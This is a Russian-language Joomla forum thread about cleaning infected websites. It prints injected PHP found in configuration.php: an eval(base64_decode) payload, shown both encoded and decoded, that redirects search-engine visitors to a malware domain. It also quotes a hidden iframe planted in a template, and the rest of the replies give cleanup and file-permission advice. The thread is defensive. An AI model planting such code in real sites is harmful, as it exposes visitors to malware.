Вы здесь: Home Форум
IT-К@ФЕ. Welcome! :)
   
Добро пожаловать, Гость
Логин: Пароль: Запомнить меня
Забыли пароль? Забыли логин? Регистрация

IT-К@ФЕ
Форум
Joomla
Безопасность сайта на Joomla

Вирус на сайте
(1 чел.) (1) гость
Ответить в теме
Новая тема
  • Страница:
  • 1

ТЕМА: Вирус на сайте

Вирус на сайте 1 год, 6 мес. назад #293

  • Aleksej
  • Вне сайта
  • Moderator
  • Постов: 1738
  • Репутация: 40
Внимание, угроза!

Некоторое время назад один из сайтов перестал открываться... вернее, его открытие в Mozilla Firefox предваряла грозная надпись:

Занесен ли сайт xxxxxxx в список подозрительных веб-сайтов?

Сайт занесен в список подозрительных веб-сайтов – посещение этого сайта может нанести вред вашему компьютеру.

В некоторой части этого сайта несколько раз (1) за последние 90 дней была замечена подозрительная активность.

Что произошло во время последнего просмотра этого сайта компанией Google?

Из протестированных нами за последние 90 дней страниц данного сайта (2) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 2. Последний раз сайт просматривался Google 2010-10-22, а подозрительное содержание было обнаружено 2010-10-22.

Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая freexxpote.co.cc/.

This site was hosted on 1 network(s) including AS12695 (DINET).


При ближайшем рассмотрении было обнаружено, что файл configuration.php модифицирован:

<?php
eval(base64_decode("JHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJzaXRlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mcmVleHhwb3RlLmNvLmNjLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCg=="));


В качестве лечения:

$ php -r 'echo
base64_decode("JHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJzaXRlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mcmVleHhwb3RlLmNvLmNjLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCg==");'


Но - что же это была за абракадабра такая?

Воспользовавшись сервисом Free online base64 encoder and decoder и введя часть кода, находящуюся между кавычек, получаем:
$referer=$_SERVER['HTTP_REFERER'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
        if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){             
                header("Location: http://freexxpote.co.cc/");
                exit();
        }
        }
Изменено: 1 год, 6 мес. назад от Aleksej.
Ответить Цитировать

Re: Вирус на сайте 2 мес., 1 нед. назад #3801

  • fluffy
  • Вне сайта
  • Fresh Boarder
  • Постов: 3
  • Репутация: 0
Алексей, приветствую! Очень комфортный у тебя сайт, спасибо за работу!
Жалуюсь на проблему, собственно. Пытаюсь зайти на свой сайт, а НОД пишет, что прерывает соединение из -за угрозы HTML/Iframe.B.Gen вирус. Гугл не помог, что-то свеженькое, вероятно. Сайт этот.
Что делать несчастному чайнику?
Ответить Цитировать

Re: Вирус на сайте 2 мес., 1 нед. назад #3802

  • Aleksej
  • Вне сайта
  • Moderator
  • Постов: 1738
  • Репутация: 40
Привет, пусть несчастный чайник попробует для начала iframe убрать или закомментить; он у тебя где-нить в индексном файле шаблона сидит:

<iframe name="SagUTeXYne" src="http://freedom24.ru/templates/rhuk_milkyway/kx/index.php?out=1330961285" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe></body>
Изменено: 2 мес., 1 нед. назад от Aleksej.
Ответить Цитировать

Re: Вирус на сайте 2 мес., 1 нед. назад #3803

  • fluffy
  • Вне сайта
  • Fresh Boarder
  • Постов: 3
  • Репутация: 0
Да Вы волшебник, Сэр! Таки оно...
УРРРЯЯЯ!!!! СПАСИБОООО!!!!!
А как эта дрянь туда залезает, если не сильно отвлекаю тупыми вопросами? Может, вахтера какого на сайтик пора установить?
Ответить Цитировать

Re: Вирус на сайте 2 мес., 1 нед. назад #3804

  • Aleksej
  • Вне сайта
  • Moderator
  • Постов: 1738
  • Репутация: 40
fluffy написал:
А как эта дрянь туда залезает, если не сильно отвлекаю тупыми вопросами? Может, вахтера какого на сайтик пора установить?

В моей практике не было заражения сайта ифреймами, хвала всевышнему... но вот hubbitus говорит, что такое бывает, и нередко. Слушай, а ты уверен, что iframe не присутствовал в шаблоне сайта изначально? взгляни в старой резервной копии.

А вот что я видел неоднократно, так это заражение сайта злонамеренным программным кодом - виной чему ошибки админов, грамотно не расставивших файлам/каталогам необходимый и достаточный минимум permissions. В качестве несложного примера; если файлу configuration.php в корне сайта свойственно 0777 - то это спустя очень непродолжительное время гарантированное заражение сайта; если не ифреймом, так другой какой завернутой в base64_decode гадостью.

Спроси у поддержки хостинга, какие права на файлы/каталоги требует их апач, и взгляни, как там в реальности они у тебя расставлены. Всякое бывает. Можешь просто, зайдя по ssh, воспользоваться вот этим скриптом, дабы модифицировать разрешения:

find public_html -type d -exec chmod 0755 {} \;
find public_html -type f -exec chmod 0644 {} \;

Соответственно, 0755 и 0644 исправь на другие, если не подойдут. Или оставь так.

Вторая часто встречающаяся причина проблем с сайтами - виндовые файл-менеджеры, хранящие ftp-пароли в открытом виде. Плюс отсутствие хорошего антивируса на локальном рабочем компьютере. Здесь можно посоветовать перейти на использование токенов и сертификатов, отказавшись от паролей вообще..

Думаю, если учесть несложные, в общем, правила it-безопасности в работе с сайтом - всякие-разные "сторожа" без надобности. Конечно, gitignore или subversion неплохо бы освоить при случае.
Изменено: 2 мес., 1 нед. назад от Aleksej.
Ответить Цитировать

Re: Вирус на сайте 1 мес., 1 нед. назад #3962

  • Masha
  • Вне сайта
  • Fresh Boarder
  • Постов: 3
  • Репутация: 0
Помогите мне аааааа у меня на соей сайте о сериале Ходячих выходит Gen вирус у меня антивирус уже красный стал помоги мне его убрать аааааа
Ответить Цитировать

Re: Вирус на сайте 1 мес., 1 нед. назад #3963

  • serge
  • Вне сайта
  • Expert Boarder
  • Постов: 149
  • Репутация: 7
Masha написал:
у меня на соей сайте о сериале Ходячих выходит Gen вирус у меня антивирус уже красный стал

Попробуйте вот эти скрипты. Все ведь давно для вас выложено.
Ответить Цитировать

Re: Вирус на сайте 1 мес., 1 нед. назад #3964

  • Masha
  • Вне сайта
  • Fresh Boarder
  • Постов: 3
  • Репутация: 0
а его искать в шаблоне?( index.php?(
Ответить Цитировать

Re: Вирус на сайте 1 мес., 1 нед. назад #3966

  • serge
  • Вне сайта
  • Expert Boarder
  • Постов: 149
  • Репутация: 7
Существует немало способов помочь в вашей беде. Начните с самого простого - скачайте каталог вашего сайта на wp - себе на комп и тщательно просканируйте хорошим антивирусом с актуальной базой. Допустим, Касперским или ДокторомВебом. Удалите все, что антивирь посчитает нужным удалить, затем залейте каталог обратно и обновите движок wp через панель управления.

Либо у себя на локалке замените удаленные антивирусом файлы аналогами из распакованного архива движка wordpress(скачайте c оф. сайта).

Само собой разумеется, что перед тем, как что-либо делать - совершенно необходимо создать резеврную копию вашего сайта (дерево каталогов + база данных). Приступать к очистке, не имея под рукой актуального бэкапа - очень не рекомендуется.

Также вам в помощь бесплатные сервисы проверки сайтов на вирусы от компаний taghosting.ru и drweb.com.
Ответить Цитировать

Re: Вирус на сайте 1 мес., 1 нед. назад #3967

  • Masha
  • Вне сайта
  • Fresh Boarder
  • Постов: 3
  • Репутация: 0
как же тяжело
Ответить Цитировать
Ответить в теме
Новая тема
  • Страница:
  • 1
IT-К@ФЕ
Форум
Joomla
Безопасность сайта на Joomla
Время создания страницы: 0.32 секунд